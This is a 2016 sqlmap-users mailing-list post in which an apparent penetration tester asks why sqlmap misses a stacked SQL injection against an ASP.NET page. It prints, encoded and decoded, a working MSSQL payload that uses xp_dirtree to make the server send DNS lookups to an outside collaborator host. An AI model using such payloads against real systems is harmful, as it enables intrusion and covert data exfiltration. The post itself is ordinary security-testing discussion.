[sqlmap-users] Sqlmap/DNS exfil
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Sqlmap/DNS exfil
|
From: Mark M. <vv...@ho...> - 2016-12-19 22:03:51
|
I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app: GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1 To make that a little easier to read, the injected value is: ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;-- I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page. The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all. I've provided the OS/DBMS and --level 5, but still no dice. I'm using sqlmap v1.0.12#stable. Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.) However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding? Thanks V |
